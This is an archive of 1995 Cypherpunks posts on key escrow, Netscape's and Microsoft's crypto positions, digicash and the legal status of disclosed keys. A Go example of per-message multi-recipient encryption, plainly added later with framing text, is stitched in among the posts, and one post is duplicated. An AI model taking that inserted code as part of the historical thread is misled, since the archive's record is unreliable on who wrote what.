From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Thu, 7 Dec 95 19:24:21 PST
To: pfarrell@netcom.com
Subject: Re: GAK solutions was: Is there a lawyer in the house?
Message-ID: <199512080324.WAA22651@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


[By the way, I know that my sig on that message was bogus.  I made the
mistake of editing the message after signing it and sent it before
I stopped to think.]

>Date: Thu, 07 Dec 1995 22:07:00 -0400 (EDT)
>From: Pat Farrell <pfarrell@netcom.com>
>Subject: GAK solutions was: Is there a lawyer in the house?

>Interesting. At the NIST meeting, criteria #5 deals with decrypting
>a conversation with only the key from one end.
>
>I thought that would be hard to implement. But during the discussion,
>they called on Miles Smid [sp?] who was obviously a NIST employee/consultant
>with real knowledge. He suggested that you could encrypt the
>session key with the public key of both parties, and send it along.
>This would allow single ended GAK.

Miles Smid is a NIST employee who is quite knowledgeable about crypto
and Clipper.

>This is not far from the idea that CME proposed that the NSA/FBI/CIA
>publish public keys, and we'll hack a voluntary version of PGP that
>encrypts the session key with the LEA public key -- instant
>voluntary Key Escrow.

I still think that's the only way the gov't will get GAK -- :)

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 7 Dec 95 19:33:00 PST
To: cypherpunks@toad.com
Subject: Strange Unix behavior dealing with utmp - anyone recognize this?
Message-ID: <9512080330.AA27098@all.net>
MIME-Version: 1.0
Content-Type: text


I was sending out a few hundred 25K emails over a period of a minute or so
when my system encountered this thrilling sequence:

Dec  7 22:11:56 all vmunix: file:<3>zs1: silo overflow
Dec  7 22:11:57 all syslogd: /etc/utmp: File table overflow
Dec  7 22:11:56 all vmunix:  table is ful<3>zs1: silo overflow

It appears to be some sort of file table overflow related to the syslog
daemon.  The message repeats numerous times and I think it has to do
with the number of messages sent over a short time, however:

	I regularly send far more messages without this error
	It lost the processes that were generating these messages
		so I had to redo part of the mailing.

Does anyone recognize the symptom, and does this open a potential for
attack by stress?  (e.g., if you can get something to fail in this way
can the failure cause something to be missed?)

Just thought I'd mention it.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Thu, 7 Dec 95 22:34:57 PST
To: cypherpunks@toad.com
Subject: the X.9 Electronic Payments ANSI standard
Message-ID: <199512080630.WAA17998@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	My inquiries regarding Rich's post of the X.9 informal notes
were rather fruitful. The chair of the working group seems interested
in including anonymous token-based payment systems in the standard, "I
see no reason, other than interest, for the group to avoid
non-account-based payment systems, to complement the account-based
payment systems that we are now in the process of standardizing."

	Someone from Citicorp pointed me to http://www.llnl.gov/fstc
and asked for my feedback.

	These people do seem interested in anonymous systems, they
just don't have anyone who knows the stuff to work on it. 

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Thu, 7 Dec 95 19:41:35 PST
To: pfarrell@netcom.com
Subject: Re: GAK solutions was: Is there a lawyer in the house?
Message-ID: <199512080342.WAA27745@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



>>This is not far from the idea that CME proposed that the NSA/FBI/CIA
>>publish public keys, and we'll hack a voluntary version of PGP that
>>encrypts the session key with the LEA public key -- instant
>>voluntary Key Escrow.
>
>I still think that's the only way the gov't will get GAK -- :)


Actually, the real proposal (http://www.clark.net/pub/cme/html/no-ke.html)
is to have them give me their public keys.  I would sign and post them.
The world's citizens would then add them to their public keyrings and, when
they feel like volunteering GAK, would include these agencies as
crypto-recipients -- on a per-message basis.

No meetings -- no hassle -- nearly 0 cost -- and the gov't could have GAK 
tomorrow.

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+
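
The scheme discussed in Pat Farrell's message (the session key encrypted to both parties) and in Carl Ellison's replies (agencies listed as recipients on a per-message basis), as an added Go example that is not PGP's code or packet format: one AES-GCM body with an RSA-OAEP-wrapped copy of the session key for each listed recipient. The recipient names, the Envelope layout and the message text are constructed for the illustration.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Keyring maps a recipient name to that recipient's public key.
type Keyring map[string]*rsa.PublicKey

// Envelope carries the body encrypted once under a random session key, plus
// one wrapped copy of that session key for every recipient the sender listed.
type Envelope struct {
	Wrapped map[string][]byte // recipient name -> RSA-OAEP(session key)
	Nonce   []byte
	Body    []byte // AES-256-GCM ciphertext and tag
}

var ErrNotRecipient = errors.New("no wrapped session key for this name")

func newGCM(key []byte) (cipher.AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Seal encrypts plaintext for exactly the recipients in to. The list is chosen
// per message, so a key left out of to gives its holder no way in.
func Seal(plaintext []byte, to Keyring) (*Envelope, error) {
	session := make([]byte, 32)
	if _, err := rand.Read(session); err != nil {
		return nil, err
	}
	gcm, err := newGCM(session)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	env := &Envelope{Wrapped: map[string][]byte{}, Nonce: nonce}
	env.Body = gcm.Seal(nil, nonce, plaintext, nil)
	for name, pub := range to {
		// The name is used as the OAEP label, binding each copy to its slot.
		w, err := rsa.EncryptOAEP(sha256.New(), rand.Reader, pub, session, []byte(name))
		if err != nil {
			return nil, err
		}
		env.Wrapped[name] = w
	}
	return env, nil
}

// Open recovers the body using one recipient's private key and nothing else.
func Open(env *Envelope, name string, priv *rsa.PrivateKey) ([]byte, error) {
	w, ok := env.Wrapped[name]
	if !ok {
		return nil, ErrNotRecipient
	}
	session, err := rsa.DecryptOAEP(sha256.New(), rand.Reader, priv, w, []byte(name))
	if err != nil {
		return nil, err
	}
	gcm, err := newGCM(session)
	if err != nil {
		return nil, err
	}
	return gcm.Open(nil, env.Nonce, env.Body, nil)
}

// MustKey generates a fresh 2048-bit key pair for the demonstration.
func MustKey() *rsa.PrivateKey {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return k
}

func main() {
	alice, bob, agency := MustKey(), MustKey(), MustKey()
	// The sender lists herself as well as Bob: "the public key of both parties".
	to := Keyring{"alice": &alice.PublicKey, "bob": &bob.PublicKey}
	env, err := Seal([]byte("lunch at noon"), to)
	if err != nil {
		panic(err)
	}
	pt, err := Open(env, "alice", alice)
	fmt.Printf("sender's key alone: %q, err=%v\n", pt, err)
	_, err = Open(env, "agency", agency)
	fmt.Println("agency, not listed:", err)
}
```

Because the sender's own key is among the recipients, whoever holds a copy of that one private key can read every message she sends, which is the single-ended property the thread is weighing.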




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 7 Dec 95 14:11:14 PST
To: cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
In-Reply-To: <2.2b8.32.19951207150646.006874cc@panix.com>
Message-ID: <Pine.HPP.3.91.951207225242.6277A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Duncan Frissell wrote:

> Is there an existing Post Office Bank in Sweden?  If so, can foreigners open
> accounts?  The UK's postal bank (Girobank) has become more like a normal

Yes, Nordbanken. It started as a government owned Post Office bank but
was privatized years ago. It still is closely connected to Posten. I'm
sure a foreigner can open an account - the Swedish banking system is
very deregulated nowadays, and Sweden is (unfortunately) an EU member.

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Thu, 7 Dec 95 14:20:19 PST
To: cypherpunks@toad.com
Subject: Re: 1)Age etc CA 2)Swedish Digicash
In-Reply-To: <199512071601.IAA23556@blob.best.net>
Message-ID: <Pine.HPP.3.91.951207225929.6277B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, James A. Donald wrote:

> I would wait for some more solvent foreign country to get into digicash.

The Swedish crown had a bad reputation after repeated devaluations
in the 70-80's. This trend has stopped, it seems, and trust has been
built up in the last year (1 US$ has dropped from 9 to 6.50).

Mats




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 8 Dec 95 23:23:53 PST
To: cypherpunks@toad.com
Subject: Re: Netscape speaks with a forked tongue:
Message-ID: <199512090724.XAA01834@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:11 AM 12/9/95 GMT, Dan Weinstein wrote:
> You are quoting a reporter and attributing it to Jim Clark, do you
> understand what is wrong with that?

Jim Clark has had ample opportunity to clarify his statements.

He has not clarified his statements and he has not disowned 
the reported version of his comments, despite repeated
requests to do so.

Once again I request him to do so.

Once again I ask what he means, once again I complain that 
if that is not what he meant, he should now say something that 
is unambiguously different from what he was reported as saying.

>It has been reported by those that attended the Clipper II meeting on
>Monday(?) that the Netscape representative read an official statement
>very much in opposition to GAK. 

I have not seen this statement, and I have asked for it:  Once again
I ask for it.  In particular I ask that it be placed on their web if
it says what they say that it says.

> > Jim Clark's  supposedly anti GAK statement was incomprehensible to me.
> > Perhaps he needs a punchier ghostwriter:

> Clark's statement was certainly something less than clearly in
> opposition to GAK, but I think at worst he could be said to be resigned
> to GAK, not a supporter of it.

It was worse than that:  he said nothing at all, the "clarification" 
statement was a cloudy fog.

> > If Jim Clark wishes to persuade us that his heart is in the right
> > place, he should put something like the following somewhere on the
> > Netscape web pages:
> >
> >    "Our customers do not want government access to
> >     their cryptographic keys.  Mandatory government
> >     access to keys violates the rights of our
> >     customers.  Therefore we will not foist
> >     government access to keys on those customers
> >     who have freedom to communicate securely.
> >
> >     We will only build government access to keys
> >     into our products for those customers whose
> >     governments force them to provide such access.
> >    "
> >
> > If that really is Netscape's policy, then they should tell the world
> > that that really is Netscape's policy, thus instantly relieving the
> > fear, uncertainty, and doubt created by the unfortunate widespread
> > misinterpretation of Jim Clark's original statements.


> Jeff Weinstein has promised that when the representative from the
> conference returns to Mountain View, they will publish his statement
> on web.

Still waiting.

I am sure that by now Netscape knows what its policy is on government
access to keys:   I ask them to tell the world, and to tell the
world in such a way that they cannot retract their words without
some embarrassment.


> Again, you seem fixated on making Clark's opinions equivalent to the
> position of Netscape Communications Corp, this is not a reasonable
> assumption.

Clark is not a Netscape employee.

Clark owns a controlling interest in Netscape and is chairman of the board.
Netscape's policies are whatever he says they are, except in the highly 
unlikely event that he is opposed by both Jim Barksdale and Kleiner Perkins 
plus a substantial majority of the lesser shareholders.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 8 Dec 95 23:24:05 PST
To: cypherpunks@toad.com
Subject: Re: Netscape speaks with a forked tongue:
Message-ID: <199512090725.XAA02509@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 03:11 AM 12/9/95 GMT, Dan Weinstein wrote:
> You are quoting a reporter and attributing it to Jim Clark, do you
> understand what is wrong with that?

Jim Clark has had ample opportunity to clarify his statements.

He has not clarified his statements and he has not disowned 
the reported version of his comments, despite repeated
requests to do so.

Once again I request him to do so.

Once again I ask what he means, once again I complain that 
if that is not what he meant, he should now say something that 
is unambiguously different from what he was reported as saying.

>It has been reported by those that attended the Clipper II meeting on
>Monday(?) that the Netscape representative read an official statement
>very much in opposition to GAK. 

I have not seen this statement, and I have asked for it:  Once again
I ask for it.  In particular I ask that it be placed on their web if
it says what they say that it says.

> > Jim Clark's  supposedly anti GAK statement was incomprehensible to me.
> > Perhaps he needs a punchier ghostwriter:

> Clark's statement was certainly something less than clearly in
> opposition to GAK, but I think at worst he could be said to be resigned
> to GAK, not a supporter of it.

It was worse than that:  he said nothing at all, the "clarification" 
statement was a cloudy fog.

> > If Jim Clark wishes to persuade us that his heart is in the right
> > place, he should put something like the following somewhere on the
> > Netscape web pages:
> >
> >    "Our customers do not want government access to
> >     their cryptographic keys.  Mandatory government
> >     access to keys violates the rights of our
> >     customers.  Therefore we will not foist
> >     government access to keys on those customers
> >     who have freedom to communicate securely.
> >
> >     We will only build government access to keys
> >     into our products for those customers whose
> >     governments force them to provide such access.
> >    "
> >
> > If that really is Netscape's policy, then they should tell the world
> > that that really is Netscape's policy, thus instantly relieving the
> > fear, uncertainty, and doubt created by the unfortunate widespread
> > misinterpretation of Jim Clark's original statements.


> Jeff Weinstein has promised that when the representative from the
> conference returns to Mountain View, they will publish his statement
> on web.

Still waiting.

I am sure that by now Netscape knows what its policy is on government
access to keys:   I ask them to tell the world, and to tell the
world in such a way that they cannot retract their words without
some embarrassment.


> Again, you seem fixated on making Clark's opinions equivalent to the
> position of Netscape Communications Corp, this is not a reasonable
> assumption.

Clark is not a Netscape employee.

Clark owns a controlling interest in Netscape and is chairman of the board.
Netscape's policies are whatever he says they are, except in the highly 
unlikely event that he is opposed by both Jim Barksdale and Kleiner Perkins 
plus a substantial majority of the lesser shareholders.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 7 Dec 95 20:26:00 PST
To: adam@obscura.com (Adam philipp)
Subject: Re: Netscape stock on 12/7/95
In-Reply-To: <9512072217.AA16206@toad.com>
Message-ID: <199512080426.XAA06122@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 16% tumble today...
> 
>    ...is the word getting out?

  I don't think it is a coincidence that Microsoft also made their
major announcements today. I doubt the feeding frenzy over Internet
related stocks and technology is even close to over. Having seen
the new Shockwave plugin for Netscape, I expect Macromedia stock
to go up again soon. (it already went up 50% after the original Netscape
announcement of Director integration)
 
-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Thu, 7 Dec 95 23:27:16 PST
To: Rich Graves <cypherpunks@toad.com
Subject: Re: FW: websurfer 4.6
Message-ID: <199512080648.AAA30444@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 7 Dec 1995 15:12:07 -0500
> Subject:       Re: FW: websurfer 4.6
> To:            cypherpunks@toad.com
> From:          Rich Graves <llurch@networking.stanford.edu>

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Thu, 7 Dec 1995, Anonymous wrote:
> 
> > Not surprising. They confuse random doodling with software, too.
> > 
> > The real problem with NetManage is a severe case of brain death.
> 
> My, thanks for your opinion.
> 
> It may interest you to know that Microsoft recently licensed a bunch of 
> stuff from NetManage (San Jose Merc, no real details given).

Yeah, and they also think that Windoze is a real operating system, 
too...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp" <ecarp@netcom.com>
Date: Thu, 7 Dec 95 23:26:41 PST
To: Aleph One <llurch@networking.stanford.edu
Subject: Re: [NOISE] Re: FW: websurfer 4.6
Message-ID: <199512080659.AAA31407@khijol>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Thu, 7 Dec 1995 15:49:09 -0600 (CST)
> From:          Aleph One <aleph1@dfw.net>
> To:            Rich Graves <llurch@networking.stanford.edu>
> Cc:            cypherpunks@toad.com
> Subject:       Re: [NOISE] Re: FW: websurfer 4.6

> On Thu, 7 Dec 1995, Rich Graves wrote:
> 
> [snip]
> > Microsoft's strategy is to support VB.
> [snip]
> > -rich
> > 
> 
> It's interesting to note that all the people that were raving mad about Java
> seem to be quiet now that MS is proposing to use VB. At least Java was 
> designed from the ground up with security in mind. But VB? Actual binary

Well, at least it's easy and fun to program in (if you can call 
drag-'n-drop "coding").  Of course, until 4.0, their setup utility 
didn't check what version of DLL you were installing, so it's easy to 
get your DLLs out of sync on your system and blow your applications 
all to hell, and 4.0 throws all this OLE crap in, even if you don't 
need/want/use OLE in your code and makes a 300K application into a 3M 
one, and they won't tell you what really goes on underneath the hood 
(I guess they're paranoid about getting ripped off), and never mind 
that it's almost trivial to write a VB decompiler (the .EXE is just a 
big jump table into offsets into VBRUN300.DLL), etc., etc., etc...

And all this from a software company that took over 10 years to make 
their "operating system" do preemptive *anything*.

But I guess I shouldn't complain.  After all, VB has made me a pretty 
decent living for the past year or so...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: leefi@microsoft.com
Date: Fri, 8 Dec 95 00:27:21 PST
To: <cypherpunks@toad.com>
Subject: Re: Micro$oft and Java
Message-ID: <c=US%a=_%p=msft%l=RED-09-MSG951208002301SA006801@red-01-msg.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


| The interesting thing here is a plan to use digital signatures on 
| controls and scripts as a means of authentication.

There was a press release on this. The PR index on 
http://www.microsoft.com/corpinfo/pr.htm points to a few 
Internet-related announcements that were made on 12/7. A brief 
quote on these signatures:

"Microsoft plans to propose the Internet digital signature 
specifications to the W3C and the IETF as an open Internet standard. 
The technology will be an open, proposed specification available to 
the entire Internet community.  In addition, as part of the Open 
Process Design Review, Microsoft will host a digital signature design
preview in January to solicit feedback from the Internet community."

This week there was also another workshop for ~150 ISVs, and these 
signatures were one of the topics. The event was not under any NDA, 
so you should start seeing feedback once folks get home and they 
catch up with mail (at least two were on Cypherpunks). The folks 
putting on the event have put lots of docs on the "Sweeper" SDK, on 
the below-referenced web site. Honestly, I'm not sure if all the stuff
from the event this week is up there; if not now, most of it will get
added in the next week or so.

| Servers and some clients will support end-to-end encryption.  No 
| details...

I believe SSL in current versions of the web browser and server, PCT 
around the corner (perhaps PCT is earlier than I'm thinking).

| Maybe I'll test the search capabilities of the MS Web site later tonight.

The clearinghouse for internet developer info (opened 12/7):
  http://www.microsoft.com/intdev/
It contains info on various VB Script, OLE Control, etc, as they refer to 
some of our Internet solutions.

A page related to this press briefing (I presume also opened 12/7):
  http://www.microsoft.com/internet/

Hope this helps,
Lee Fisher
(wondering if I really should've de-lurked)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Thu, 7 Dec 95 21:53:04 PST
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <Pine.SUN.3.91.951207202351.6540B-100000@polaris.mindport.net>
Message-ID: <199512080554.AAA05788@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn writes:
> Yes.  I have seen holdings which indicate that information given to an 
> employer, where there was no obvious expectation that it be kept 
> confidential, estopped 4th amendment protections to its introduction when 
> obtained without a warrant.
[...and...]
> Again, because of the nature of the relationship.  There is an 
> expectation that a conversation with an attorney is one of the most 
> private exchanges you can engage in.  As for rare exceptions, I'm not so 
> sure I would term them rare.

What happens if I disclose a key to my employer's corporate law firm ?
Does that clearly lie one way or the other, or would it likely hinge upon 
the conditions under which I came to reveal the key ?

-Futplex <futplex@pseudonym.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com (James A. Donald)
Date: Fri, 8 Dec 95 17:17:26 PST
To: cypherpunks@toad.com
Subject: Netscape speaks with a forked tongue:
Message-ID: <199512090118.RAA10458@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


Netscape speaks with a forked tongue:

Jim Clark, top guy and owner of netscape, has issued a statement in
support of government access to keys:


    "To secure Net communications, the government
      will need to have access to private data exchanges using
      what is known as a key escrow security system
     "

and he has issued a statement that Jeff (a netscape employee) has very
generously interpreted as anti GAK.  (Government access to keys)

The only clear and authoritative statement issued by Netscape on GAK
is Jim Clark's speech in support of GAK. Everything else is a cloud of
unintelligible fog, or was issued by people with no authority and
given a minimum of publicity.

Jim Clark's  supposedly anti GAK statement was incomprehensible to me.
Perhaps he needs a punchier ghostwriter:

I offer my services free of charge.  :-)

If Jim Clark wishes to persuade us that his heart is in the right
place, he should put something like the following somewhere on the
Netscape web pages:

    "Our customers do not want government access to
     their cryptographic keys.  Mandatory government
     access to keys violates the rights of our
     customers.  Therefore we will not foist
     government access to keys on those customers
     who have freedom to communicate securely.

     We will only build government access to keys
     into our products for those customers whose
     governments force them to provide such access.
    "

If that really is Netscape's policy, then they should tell the world
that that really is Netscape's policy, thus instantly relieving the
fear, uncertainty, and doubt created by the unfortunate widespread
misinterpretation of Jim Clark's original statements.

The only clear and authoritative statement issued by Netscape on GAK
is Jim Clark's speech in support of GAK. Everything else is a cloud of
unintelligible fog, or was issued by people with no authority and
given a minimum of publicity.




 ---------------------------------------------------------------------
We have the right to defend ourselves and our property, because 
of the kind of animals that we are. True law derives from this 
right, not from the arbitrary power of the omnipotent state.

http://www.jim.com/jamesd/      James A. Donald       jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam philipp <adam@rosa.com>
Date: Fri, 8 Dec 95 00:43:08 PST
To: cypherpunks@toad.com
Subject: Secrets (was:Is there a lawyer in the house?)
Message-ID: <9512080843.AA03439@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


   There seems to be some confusion about what the law of the land considers
a "secret." Secrets according to our laws are knowledge one does not share
without a BINDING legal obligation to keep the secret. 
   Remember R4.C? That was a secret until it was shared, and hence lost its
privileged position as a "Trade secret." 
   Your secret key is just as safe, so long as it is always kept out of
anyone else's hands. However if you are going to provide it to someone else
it should be only through some form of contract. Even this might not be
sufficient in some circumstances. The only truly safe possibility would be
giving it to your lawyer in the course of your lawyer's representation of
you. NOTE: NOT YOUR COMPANY'S LAWYER. In-house counsel have their obligation
to the company, not to you. As such if they felt your key was unrelated to
company business interests and possibly adverse to the company's
interest...kiss that secret good bye. 
   Sure, the police still need a warrant to go into your house and get the
key, but they do NOT need a warrant to ask anyone else for your key, if you
revealed your secret to someone who does not have an obligation of
confidentiality to you, then they can reveal it with impunity. The danger of
revealing it to a nonlawyer who has a contract with you is that they can be
forced to reveal it, and still be liable to you for breach of contract...

   I am sure you see the dangers...just say no to key escrow...much safer.

   -Adam

[NOTE: I am not an attorney, this is not legal advice, you get what you pay for]

--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\
|PGP key available on my home page|Unauthorized interception violates |
|  http://XXXXXXXXXXXXXXXXX/adam  |federal law (18 USC Section 2700 et|
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted  |
|SUB ROSA...                      |communications are preferred for   | 
|  (see home page for definition) |sensitive materials.               |
\-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <greg@ideath.goldenbear.com>
Date: Fri, 8 Dec 95 02:06:17 PST
To: tcmay@got.net
Subject: Re: Is there a lawyer in the house?
In-Reply-To: <30C8177F.47AF@goldenbear.com>
Message-ID: <199512081002.AA01851@ideath.goldenbear.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

Timothy C. May wrote:
> Sameer Parekh writes:
> >How is this different from
> >Bob has key. Cop wants Bob's key. Cop tells Bob "I want your key,
> >you need to give it to me. I don't have a warrant."
> >

> But I share Sameer's confusion. If cops show up at my door, they must, it
> seems to me, present proper warrants before they can _enter_ my premises,
> or _search_ my premises. Something given to me, whether a letter, a key, a
> photo, etc., is essentially *my property* and may not simply be taken away
> from without due process.

What's important here is the difference between things and information -
if the cops want to get *things* in your possession, they need a warrant
or consent or exigent circumstances or whatever. If they want to get 
*information* in your possession, they can subpoena you and make you talk 
(or show them the papers/records/whatever, modulo the Fifth amendment, modulo
immunity). Either way, the standard for due process (essentially nothing
for a subpoena - "more likely than not will lead to the discovery of fruits
of/evidence of a crime" for a warrant) is pretty minimal.

But, it's worse than that: as a matter of federal law, if I write "I, Greg
Broiles, killed Jimmy Hoffa and hid his body in one of the concrete columns
used to construct Giants Stadium", and give that piece of paper to you, and
cops search your house illegally and find that scrap of paper, the information
on the paper (if not the paper itself) can be used against me, even though
it was found in an illegal search. I wouldn't have "standing" (e.g., a legal
basis to contest the search) because federal law doesn't think I have a 
privacy interest in the stuff in your house.

I think that's the tricky bit behind the idea that there's no (personal)
expectation of privacy where a key is given to an escrow agent - the standing
requirement. State constitutions and statutes may provide a higher level of
protection - Oregon's constitution, for example, is interpreted to be more
generous re who's got standing to contest the legality of a search.

It occurs to me that the owner of the key might have a good argument that
they've got "third party standing", where they can essentially adopt the
position of the key's owner, because the key's owner is in a position such 
that they can't do a good job of representing their own interests, and the
third party will. (e.g., the doctor(?) in _Eisenstadt v. Baird_) The owner
of the key (at least if they're anonymous, and the key server is served with
a subpoena to "disclose the 'true name' of the owner of key 0x58ddf30d") may
wish to avoid revealing hirself. Hmm. That, of course, assumes that the
escrow holder feels like fighting the subpoena - perhaps that's something to
look for when you go escrow shopping.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMMgNC33YhjZY3fMNAQGPPQP+M7IFM/DgfEf6z5f8YUoBHo+aXPfTzwtf
xee1SPkJOxfH7dYaUIKs7JDAKxOGTaNdrlJjrMno7yHVFVHq6R7wRw8jOPUXhJ3C
VZ94LpTqNF6OPPoD+pr2MFG+SaFLl7JyS16Kbe9ilUE5cG6N2hToUibSjwyz3BKc
R95RR9TkRzs=
=4jN1
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Williams <dwwillia@cet.co.jp>
Date: Thu, 7 Dec 95 18:31:00 PST
To: Michaelh@cet.co.jp
Subject: Re: Micro$oft and Java
In-Reply-To: <199512080205.SAA02898@mail.eskimo.com>
Message-ID: <199512080231.CAA08012@parkplace.cet.co.jp>
MIME-Version: 1.0
Content-Type: text/plain



Another interesting post.  The list is really heavy.  I end up killing
most of the articles.  There are some real gems in there though.

>>>>> "Joel" == Joel McNamara <joelm@eskimo.com> writes:

    Joel> I was at the Microsoft presentation.  Crypto-relevant info:
    Joel> A patch will be published in the next few days to address
    Joel> the weak .PWL encryption.  I got a rather lame excuse about
    Joel> how the encryption was first implemented in 1991, and how it
    Joel> was sufficient then.  They will supposedly be changing the
    Joel> seed.

    Joel> I asked about what MS was doing in regard to future strong
    Joel> crypto.  Got an interesting response in that that "the
    Joel> government was going to let them implement 768 bit keys."  I
    Joel> later asked an MS person if these were RSA session keys or
    Joel> what.  He said yes, but I really don't think he knew what he
    Joel> was talking about based on some of his other comments.

    Joel> Visual Basic Script will be MS's response to JavaScript.
    Joel> The interesting thing here is a plan to use digital
    Joel> signatures on controls and scripts as a means of
    Joel> authentication.  The comment was made "you'd trust something
    Joel> signed by Lotus or some other big name, but you probably
    Joel> wouldn't be that trustful of a piece of shareware."  Hmmm...

    Joel> MS will be releasing a "safe" runtime version of Visual
    Joel> Basic that will supposedly prevent nasty virii and trojan
    Joel> horses from being implemented on Web pages.  IMHO, Perry's
    Joel> previous comments on the security of Java apply.

    Joel> Servers and some clients will support end-to-end encryption.
    Joel> No details...

    Joel> I didn't ask about GAK.  Bill said there was a white paper
    Joel> explaining Microsoft's position on encryption.  Maybe I'll
    Joel> test the search capabilities of the MS Web site later
    Joel> tonight.

    Joel> Overall, the presentation was interesting (but obviously
    Joel> lacking in technical details as the audience was mostly
    Joel> press).  MS is going to throw a lot of resources at this in
    Joel> order to maintain its industry dominance.

    Joel> Thought for the day.  Bill on the relevance of the briefing
    Joel> being held on Pearl Harbor day quoted Admiral Yamamoto after
    Joel> the 1941 attack, "we have awoken a sleeping giant."  Draw
    Joel> your own conclusions on that one...

    Joel> Joel

    Joel> --
David Wayne Williams		dwwillia@cet.co.jp
Software Engineer		http://www.cet.co.jp
Catena Enterprise Technologies	Linux, PGP, the Web: I love this Net!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 8 Dec 95 02:45:47 PST
To: cypherpunks@toad.com
Subject: Re: [NOISE] Re: FW: websurfer 4.6
Message-ID: <199512081045.CAA09807@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Dec 1995, Ed Carp wrote:

> > On Thu, 7 Dec 1995, Rich Graves wrote:

> > 
